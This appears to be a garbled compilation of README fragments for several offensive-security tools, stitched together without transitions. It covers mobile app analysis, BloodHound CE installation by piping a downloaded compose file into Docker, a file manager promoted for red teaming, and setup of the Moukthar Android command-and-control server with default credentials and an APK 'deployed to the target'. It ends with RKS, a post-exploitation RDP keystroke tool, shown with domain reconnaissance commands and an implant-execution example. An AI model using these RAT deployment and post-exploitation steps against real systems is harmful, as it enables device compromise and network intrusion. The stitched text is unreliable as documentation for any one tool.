This project is a port of covert-tube, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about the Casbaneiro and Numando malware families.
Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding sensitive information or provides suggestions for working with the identified platform.
How does it work?
The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.
Example
Cordova
Search files:
index.html
cordova.js
cordova_plugins.js
React Native Android & iOS
Search files:
Android files:
libreactnativejni.so
index.android.bundle
iOS files:
main.jsbundle
Installation
A minimum of Java 8 is required to run Apktool.
==>>Searching possible interesting words in the file
results.........
==>>Searching Private Keys in the file
results.........
==>>Searching high confidential secrets
results.........
==>>Searching possible sensitive URLs in js files
results.........
==>>Searching possible endpoints in js files
results.........
Features
This tool uses Apktool for decompilation of Android applications.
This tool renames the .ipa file of iOS applications to .zip and extracts the contents.
| Feature | Note |
| --- | --- |
| JavaScript beautifier | Use this for the first few occasions to see better results. |
| Identifying multiple sensitive information | IPs, Private Keys, API Keys, Emails, URLs |
| Cryptographic Functions | |
| Endpoint extractor | |
| Automatically detects if the code has been beautified | |
| Extracts automatically apk of devices/emulator | |
| Patching apk | |
| Extract an APK from a bundle file | |
| Detect if JS files are encrypted | Hermes |
| Detect if the resources are compressed | XALZ |
| Detect if the app is split | |
What is patching apk: This tool uses Reflutter, a framework that assists with reverse engineering of Flutter apps using a patched version of the Flutter library.
More information: https://github.com/Impact-I/reFlutter
Split APKs is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.
Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.
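On a connected device or emulator, a split app can be recognized because the package resolves to several APK paths instead of one. This is standard adb usage; the package name and the exact paths below are illustrative:

```shell
adb shell pm path com.example.app
# A split app lists base.apk plus one or more split_config.*.apk entries, e.g.:
# package:/data/app/~~xyz==/com.example.app/base.apk
# package:/data/app/~~xyz==/com.example.app/split_config.arm64_v8a.apk
# package:/data/app/~~xyz==/com.example.app/split_config.en.apk
```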
BloodHound is a monolithic web application composed of an embedded React frontend with Sigma.js and a Go based REST API backend. It is deployed with a Postgresql application database and a Neo4j graph database, and is fed by the SharpHound and AzureHound data collectors.
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.
The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.
Install Docker Compose and ensure Docker is running. This should be included with the Docker Desktop installation
Run curl -L https://ghst.ly/getbhce | docker compose -f - up
Locate the randomly generated password in the terminal output of Docker Compose
In a browser, navigate to http://localhost:8080/ui/login. Login with a username of admin and the randomly generated password from the logs
NOTE: going forward, the default docker-compose.yml example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in examples/docker-compose/README.md to configure the host binding for the container.
Installation Error Handling
If you encounter a "failed to get console mode for stdin: The handle is invalid." error, ensure Docker Desktop (and the associated Engine) is running. Docker Desktop does not automatically register as a startup entry.
If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. Please stop or delete the service to continue.
# Verify if Docker Engine is running
docker info

# Attempt to stop the Neo4j service if running (on Windows)
Stop-Service "Neo4j" -ErrorAction SilentlyContinue
A successful installation of BloodHound CE would look like the below:
Introducing Tiny File Manager [WH1Z-Edition], the compact and efficient solution for managing your files and folders with enhanced privacy and security features. Gone are the days of relying on external resources: I've stripped down the code to its core, making it truly lightweight and perfect for deployment in environments without internet access or outbound connections.
Designed for simplicity and speed, Tiny File Manager [WH1Z-Edition] retains all the essential functionalities you need for storing, uploading, editing, and managing your files directly from your web browser. With a single-file PHP setup, you can effortlessly drop it into any folder on your server and start organizing your files immediately.
What sets Tiny File Manager [WH1Z-Edition] apart is its focus on privacy and security. By removing the reliance on external domains for CSS and JS resources, your data stays localized and protected from potential vulnerabilities or leaks. This makes it an ideal choice for scenarios where data integrity and confidentiality are paramount, including RED TEAMING exercises or restricted server environments.
Requirements
PHP 5.5.0 or higher.
Fileinfo, iconv, zip, tar and mbstring extensions are strongly recommended.
How to use
Download ZIP with latest version from master branch.
Simply transfer the "tinyfilemanager-wh1z.php" file to your web hosting space; it's as easy as that! Feel free to rename the file to whatever suits your needs best.
:warning: Caution: Before use, it is imperative to establish your own username and password within the $auth_users variable. Passwords are encrypted using password_hash().
Note: You can generate a new password hash accordingly: Login as Admin -> Click Admin -> Help -> Generate new password hash
:warning: Caution: Use the built-in password generator for your privacy and security.
To enable/disable authentication set $use_auth to true or false.
:loudspeaker: Key Features
:cd: Open Source, lightweight, and incredibly user-friendly
:iphone: Optimized for mobile devices, ensuring a seamless touch experience
:information_source: Core functionalities including file creation, deletion, modification, viewing, downloading, copying, and moving
:arrow_double_up: Efficient Ajax Upload functionality, supporting drag & drop, URL uploads, and multiple file uploads with file extension filtering
:file_folder: Intuitive options for creating both folders and files
:gift: Capability to compress and extract files (zip, tar)
:sunglasses: Flexible user permissions system, based on session and user root folder mapping
:floppy_disk: Easy copying of direct file URLs for streamlined sharing
:pencil2: Integration with Cloud9 IDE, offering syntax highlighting for 150+ languages and a selection of 35+ themes
:page_facing_up: Seamless integration with Google/Microsoft doc viewer for previewing various file types such as PDF/DOC/XLS/PPT/etc. Files up to 25 MB can be previewed using the Google Drive viewer
:zap: Backup functionality, IP blacklist/whitelist management, and more
:mag_right: Powerful search capabilities using datatable js for efficient file filtering
:file_folder: Ability to exclude specific folders and files from the listing
:globe_with_meridians: Multi-language support (32+ languages) with a built-in translation feature, requiring no additional files
Move server files to /var/www/html/ and install dependencies:

```console
mv moukthar/Server/* /var/www/html/
cd /var/www/html/c2-server
composer install
cd /var/www/html/web\ socket/
composer install
```

The default credentials are username: android and password: the rastafarian in you
Set database credentials in c2-server/.env and web socket/.env
Execute database.sql
Start the web socket server, or deploy it as a service on Linux:

```console
php Server/web\ socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service
```
Modify /etc/apache2/apache2.conf:

```xml
<Directory /var/www/html/c2-server>
    Options -Indexes
    DirectoryIndex app.php
    AllowOverride All
    Require all granted
</Directory>
```
Set the C2 server and web socket server addresses in client functionality/Utils.java:

```java
public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";
```

- Compile the APK using Android Studio and deploy it to the target
A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.
About RKS (RemoteKeyStrokes)
All credit goes to nopernik for making it possible, so I took it upon myself to improve it. I wanted something that helps during the post-exploitation phase when executing commands through a remote desktop.
Help Menu
$ ./rks.sh -h
Usage: ./rks.sh (RemoteKeyStrokes)
Options:
  -c, --command <command | cmdfile>   Specify a command or a file containing commands to execute
  -i, --input <input_file>            Specify the local input file to transfer
  -o, --output <output_file>          Specify the remote output file to transfer
  -m, --method <method>               Specify the file transfer or execution method (for file transfer "base64" is set by default if not specified; for execution, "none" is set by default if not specified)
  -p, --platform <operating_system>   Specify the operating system (windows is set by default if not specified)
  -w, --windowname <name>             Specify the window name for the graphical remote program (freerdp is set by default if not specified)
  -h, --help                          Display this help message
Usage
Internal Reconnaissance
When running in command prompt
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain
$ ./rks.sh -c recon_cmds.txt
Execute Implant
Execute an implant while reading the contents of the payload in powershell.
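Using the flags from the help menu above, a hypothetical invocation might read a PowerShell payload from a file and type it into the remote desktop window (the payload filename here is an example, not part of the tool):

```shell
./rks.sh -c powershell_implant.txt -p windows -w FreeRDP
```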